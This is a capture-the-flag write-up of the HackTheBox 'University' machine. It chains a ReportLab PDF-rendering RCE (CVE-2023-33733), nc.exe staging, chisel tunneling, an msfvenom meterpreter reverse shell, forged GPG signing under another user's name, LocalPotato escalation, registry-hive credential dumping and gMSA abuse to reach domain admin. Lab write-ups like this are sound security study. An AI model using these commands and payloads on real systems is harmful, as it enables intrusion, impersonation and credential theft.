CTF Write-Up: University HTB

1. Initial Nmap Scan

The initial nmap scan showed the port set of a Windows domain controller (DNS, Kerberos, LDAP/LDAPS, SMB, RPC) plus an nginx web server that redirects to http://university.htb/, so that hostname needs an /etc/hosts entry. Two details are worth noting: the Kerberos banner's server time (2024-11-03 03:05Z) is roughly seven hours ahead of the scanner's clock, so any Kerberos-based tooling will need the skew corrected (ntpdate or faketime), and port 2179 (vmrdp) is the Hyper-V Virtual Machine Connection service, a hint that this host also runs virtual machines.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 16:03 EDT
Nmap scan report for 10.10.11.39
Host is up (0.76s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          nginx 1.24.0
|_http-title: Did not follow redirect to http://university.htb/
|_http-server-header: nginx/1.24.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-03 03:05:24Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

2. Initial Foothold

Running exiftool on the profile.pdf that the site generates for our profile (studenthacker) exposed the PDF engine behind it:

ExifTool Version Number         : 12.76
File Name                       : profile.pdf
...
Producer                        : xhtml2pdf 
Subject                         : 
Title                           : University | studenthacker Profile

Searching for xhtml2pdf led to CVE-2023-33733, a remote code execution bug in ReportLab (the PDF engine xhtml2pdf renders with) up to version 3.6.12: its rl_safe_eval sandbox can be escaped through crafted markup attributes, so if profile fields we control are rendered into the PDF, we get code execution on the server.

3. Network Traffic Analysis with tcpdump

To confirm blind command execution before going for a shell, we listened for ICMP on the VPN interface and had the injected command ping our host:

sudo tcpdump -i tun0 icmp

ICMP Traffic:

16:59:34.769517 IP university.htb > kali: ICMP echo request, id 1, seq 2, length 40
16:59:34.769569 IP kali > university.htb: ICMP echo reply, id 1, seq 2, length 40

4. RCE Exploitation

With execution confirmed, we moved to a public proof of concept (PoC) for CVE-2023-33733. A Nishang PowerShell reverse shell did not call back, so we switched to staging nc.exe over HTTP and executing it from the injected command:

[Screenshot: PoC exploit]

Next, we started a simple HTTP server to serve nc.exe:

$ python -m http.server 8000

HTTP Server Logs:

10.10.11.39 - - [08/Aug/2025 17:10:57] "GET / HTTP/1.1" 200 - 
10.10.11.39 - - [08/Aug/2025 17:27:26] "GET /nc.exe HTTP/1.1" 200 -

We successfully got RCE:

[Screenshot: RCE exploitation]

5. Enumeration as WAO on Domain Controller

From the Evil-WinRM session as WAO on the DC, we listed the domain-joined computers with the ActiveDirectory module:

*Evil-WinRM* PS C:\Users\WAO\Documents> Get-ADComputer -Filter * -Property Name | Select-Object Name

[Screenshot: available hosts]

Pinging LAB-2 to check connectivity (note the TTL of 64 at sub-millisecond latency: Windows replies with 128 by default, so LAB-2 is likely not a Windows host):

Pinging LAB-2.university.htb [192.168.99.12] with 32 bytes of data: 
Reply from 192.168.99.12: bytes=32 time<1ms TTL=64

Digging through WAO's files on the DC, we found hidden credentials in a backup file:

[Screenshot: backup file]

6. BloodHound as WAO

We used BloodHound to map potential attack paths:

[Screenshot: BloodHound enumeration]

Nothing interesting turned up at first, so we moved on to enumeration with rpcclient:

[Screenshot: rpcclient enumeration]

7. Chisel Setup

LAB-2 lives on 192.168.99.0/24, which is not routable from our attacking host, so we tunneled through the DC with chisel: a server on our box and a client on the DC:

[Screenshots: chisel server; chisel client]

8. Initial Access on LAB-2

We logged into LAB-2 with the previously recovered credentials:

[Screenshots: LAB-2 access (1 and 2)]

9. Privilege Escalation on DC

We found a root private key used for signing certificates on the DC:

[Screenshot: WS-3 access]

We eventually gained access to WS-3 as WAO.

10. Stealing Credentials & Forging Certificates

After a series of failed login attempts, we used msfvenom to generate a reverse-TCP payload. LHOST is the DC's address on the internal 192.168.99.0/24 network rather than our own, because WS-3 cannot reach us directly; the DC relays the connection through the chisel forward shown below:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.99.1 LPORT=4445 -f exe > exploit.exe

[Screenshots: shortcut pointing at the payload; "Invalid Request" response]

Submissions apparently need a GPG signature (our first attempt was rejected with "Invalid Request"), so we generated a key pair:

gpg --gen-key

11. GPG Key Generation and Payload Creation

We created the key pair under the name Martin Rose (user ID martin.rose) and exported the public key for upload. The platform accepted a key we generated ourselves, so its check proves possession of a private key, not the identity behind it, which is why the trick works:

gpg --export -a martin.rose > gpg-pub.asc

[Screenshots: GPG key signing as Martin Rose; Steven user]

12. Reverse Shell Access

Shell as martin.t on WS-3

We detach-signed the final archive with the forged key:

gpg -u martin.rose --detach-sign final.zip
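The signing trick presumably works because the platform only checks that the signature verifies under the uploaded public key, not that the key belongs to the real Martin Rose. The following script is an added example, not part of the original write-up: it reproduces the key generation, export and detach-signing from the commands above in a throwaway keyring, then shows a naive verify accepting the forged key and a fingerprint-pinning verify rejecting it. It assumes GnuPG 2.x is installed; the e-mail address, the sample file contents and the function names are made up for the example.

```shell
#!/usr/bin/env bash
# Added example, not from the write-up: forge a signing key whose user ID says
# "Martin Rose", detach-sign a file with it, and compare a naive "Good signature"
# check against one that pins the expected key fingerprint.
# Assumptions: gpg (GnuPG 2.x) is installed; the e-mail address is made up.
set -eu

# Fresh throwaway keyring so nothing touches ~/.gnupg; prints its path.
make_keyring() {
  local dir
  dir=$(mktemp -d)
  chmod 700 "$dir"
  printf '%s\n' "$dir"
}

# Generate an unprotected RSA signing key with an attacker-chosen user ID.
forge_key() { # $1 = keyring dir
  gpg --homedir "$1" --batch --quiet --gen-key <<'EOF'
%no-protection
Key-Type: RSA
Key-Length: 2048
Key-Usage: sign
Name-Real: Martin Rose
Name-Email: martin.rose@university.htb
Expire-Date: 0
%commit
EOF
}

# Fingerprint of the forged key (the value a defender would have to pin).
fingerprint_of() { # $1 = keyring dir
  gpg --homedir "$1" --batch --with-colons --fingerprint martin.rose \
    | awk -F: '$1 == "fpr" { print $10; exit }'
}

# What the attacker uploads: the armored public key and a detached signature
# (same commands as in the write-up: --export -a and -u ... --detach-sign).
export_and_sign() { # $1 = keyring dir, $2 = file to sign
  gpg --homedir "$1" --batch --yes --armor --export martin.rose > "$2.pub.asc"
  gpg --homedir "$1" --batch --yes -u martin.rose --detach-sign "$2" # writes $2.sig
}

# Naive server-side check: import the uploaded key and verify. Succeeds for any
# cryptographically valid signature, so the forged "Martin Rose" key passes.
naive_verify() { # $1 = signed file
  local kr
  kr=$(make_keyring)
  gpg --homedir "$kr" --batch --quiet --import "$1.pub.asc"
  gpg --homedir "$kr" --batch --quiet --verify "$1.sig" "$1"
}

# Hardened check: read the signing key's fingerprint from the VALIDSIG status
# line and require it to equal one learned out of band, not from the upload.
pinned_verify() { # $1 = signed file, $2 = expected fingerprint
  local kr fpr
  kr=$(make_keyring)
  gpg --homedir "$kr" --batch --quiet --import "$1.pub.asc"
  fpr=$(gpg --homedir "$kr" --batch --status-fd 1 --verify "$1.sig" "$1" 2>/dev/null \
    | awk '$1 == "[GNUPG:]" && $2 == "VALIDSIG" { print $3; exit }')
  [ -n "$fpr" ] && [ "$fpr" = "$2" ]
}

# Full flow: returns 0 when the forged key passes the naive check, passes the
# pinned check only with its own fingerprint, and fails against a different pin.
demo() {
  local attacker payload good
  attacker=$(make_keyring)
  forge_key "$attacker" || return 1
  payload=$(mktemp)
  printf 'constructed sample course archive\n' > "$payload"   # stands in for final.zip
  export_and_sign "$attacker" "$payload" || return 1
  good=$(fingerprint_of "$attacker")
  naive_verify "$payload" \
    && pinned_verify "$payload" "$good" \
    && ! pinned_verify "$payload" "0000000000000000000000000000000000000000"
}

demo && echo "forged key: naive verify accepts it, pinned verify rejects it"
```

The naive path prints "Good signature from "Martin Rose <martin.rose@university.htb>"" for a key nobody but the attacker has ever seen; that line is all a reviewer of the upload would have had. The only reliable defence is to compare the VALIDSIG fingerprint against one obtained out of band, which is what pinned_verify does.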

On the DC we started a chisel client that listens on the DC's internal address (192.168.99.1:4445) and forwards, through our chisel server on 10.10.16.21:7001, to our handler on 10.10.16.21:4445; this is why the payload's LHOST is 192.168.99.1. The --fingerprint flag pins the server's public key:

*Evil-WinRM* PS C:\Users\WAO\Documents> ./chiselwindows.exe client --fingerprint zY/XdSKNAO+MsVYMhBMJ1sWYQTQlOX7efxgPNS4AdGk= 10.10.16.21:7001 192.168.99.1:4445:10.10.16.21:4445

After submitting the course material together with its detached signature, we waited for the callback:

meterpreter > shell
Process 3924 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.3650]
(c) 2018 Microsoft Corporation. All rights reserved.

whoami:

C:\Windows\system32>whoami
university\martin.t

Shell as Administrator on WS-3

Hello Professors. We have created this note for all the users on the domain computers: WS-1, WS-2 and WS-3. These computers have not been updated since 10/29/2023. Since these devices are used for content evaluation purposes, they should always have the latest security updates. So please be sure to complete your current assessments and move on to the computers "WS-4" and "WS-5". The security team will begin working on the updates and applying new security policies early next month. Best regards. Help Desk team - Rose Lanosta.

The note confirms the workstations are on an old patch level; the banner above shows Windows Server 2019/1809 build 17763.3650, a late-2022 level that predates the January 2023 fix for LocalPotato (CVE-2023-21746). Since wpad is owned by Administrators, we can abuse it with LocalPotato:

[Screenshots: reverse shell; LocalPotato exploit; Administrator access]

Hidden Credentials on WS-3

We saved the SYSTEM and SAM registry hives (LSA secrets additionally need the SECURITY hive), dumped them offline, and found a suspicious password:

[Screenshot: LSA dump]

We performed a password spray attack on potential users:

[Screenshot: password spray enumeration]

Administrator on DC

Using BloodHound, we identified an escalation path starting from the rose user, who can read a gMSA's managed password:

[Screenshots: rose user; gMSA credential reader]

We then used this to gain administrator access:

[Screenshot: final Administrator access]

Things That Didn't Go as Expected

We tried pivoting with the brose.w user, but it didn't work.

[Screenshot: brose.g backup]